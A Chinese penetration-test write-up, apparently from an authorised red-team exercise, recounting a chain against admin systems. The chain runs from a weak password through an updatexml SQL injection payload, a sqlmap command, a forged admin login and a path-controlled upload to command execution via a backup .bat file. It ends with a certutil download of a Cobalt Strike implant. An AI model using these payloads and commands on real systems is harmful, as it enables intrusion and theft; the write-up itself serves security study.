3月23号,晴,在实验室复现着几天前打的CTF的题目的时候接到了一个hvv通知,在晚上的时候下发了几十个靶标,吃好饭后又回到了实验室去大致看了看靶标,基本是一些门户网站和几个管理系统,看着像若依,于是就开始了对这些网站的信息收集,最终挑了几个管理系统。
拿到站点之后,8083端口是一个登录界面,试了一下弱口令 admin/123456 成功进入了后台
进入后台后,大致翻了一下功能点,想找一找有没有啥可以上传的地方,翻了一圈没找到。
然后打算抓包对一些参数进行测试,试了很多查询的点但是里面的参数好像都无法利用,后来在导出功能的 billNos 参数处发现sql注入漏洞
我们在burp中用单引号闭合billNos参数可以看到sql的报错语句
') and updatexml(1,concat(0x7e,(@@version,0x7e),1)# --+ 直接爆出了版本
这里我就直接上sqlmap去跑了,把数据包复制到txt文件中直接sqlmap -r 去跑 billNos 参数,这里我们直接 --risk 3 --level 5拉满去跑,然后使用 --random-agent 随机请求头,使用 --technique=E 来指定使用报错注入
sqlmap -r test.txt --risk 3 --level 5 --random-agent --technique=E
这里发现其中一个数据库好像是若依系统数据库,dump出 sys_user 表如下
然后解出管理员密码,去该数据库对应的网站,这里尝试了很久,admin这个账号始终登不进去,其他账号的密码也爆破不出来
这时候我们再尝试扫了一下该网站的C段,找到了一个和我们第一个看到的站点类似的网站
这里习惯性的先试了一下弱口令,发现没有,于是想到刚刚跑出来的那些数据库,去翻了翻,在另一个数据库中dump出用户表
这里的密码都被加密了,但是我们可以看到用户名,所以换个思路我们固定 123456 这个密码,然后去批量爆破用户名
这里我们用system01用户登录,密码为123456 ,成功登录
翻了一翻功能点,发现了有上传的地方,上传后还可以看到泄露的路径,但是会自动重命名且加上jpg后缀
这里我们又找到了一个上传点,在这里上传文件后,后缀不会改变,而且可用 ../ 控制上传路径,上传的路径还被映射到本ip 8082端口搭载的静态网站根目录下
但是经过测试发现上传的目录都是静态目录,无法解析我们上传地木马文件,解析不了文件就啥都白搭了
于是我们继续翻一翻功能点,找到了操作日志,里面记录了用户登录的请求参数,而且有admin的
这时候我们回去看看一看登录处的数据包,看到请求参数是我们可控的,这样我们是不是就可以伪造admin用户登录了呢
所以这里直接把参数换成admin的请求参数,成功登录admin用户
这时候我们的权限就比刚才大多了,翻到了很多刚刚system01用户没有的功能点,我们看到一个数据备份恢复的地方然后点击备份,发现提示 找不到批处理文件 .bat ,这说明这里运行了db-backup.bat文件,仔细一想这里是不是能运行bat文件,众所周知bat文件是批量处理windows命令的文件,而前面又有文件上传点且上传路径可控,那我们不就可以通过文件上传把bat文件上传到该目录下,然后在bat文件中写入我们要执行的命令,这样就达到了RCE的效果
这里我们将whoami执行的结果放到映射的目录中,这样我们访问本ip的8082端口的1.txt文件就可以看到命令执行的结果了
然后就可以做个免杀的马子上线CS了,我们做好木马之后,使用CS的钓鱼攻击里的文件下载模块,生成下载木马的URL
然后就可以使用windows自带的certutil命令将木马下到本地并执行了
certutil -urlcache -split -f URL
我们将原先的那个命令替换为上面这条下载命令和运行木马文件的命令,然后再次将这个.bat文件上传,然后点击备份,这里提示木马下载成功但是运行时找不到文件,难道有啥软把马子删了,于是这里我们尝试执行tasklist命令查看进程,看看有没有杀软
果然,有360和Microsoft Security Essentials
然后我们执行 net user /domian 发现没有域环境,那就到这里了
-END-
如果本文对您有帮助,来个点赞、在看就是对我们莫大的鼓励。![实战|记一次峰回路转的渗透测试]( "实战|记一次峰回路转的渗透测试")
原文始发于微信公众号(乌雲安全):实战|记一次峰回路转的渗透测试
评论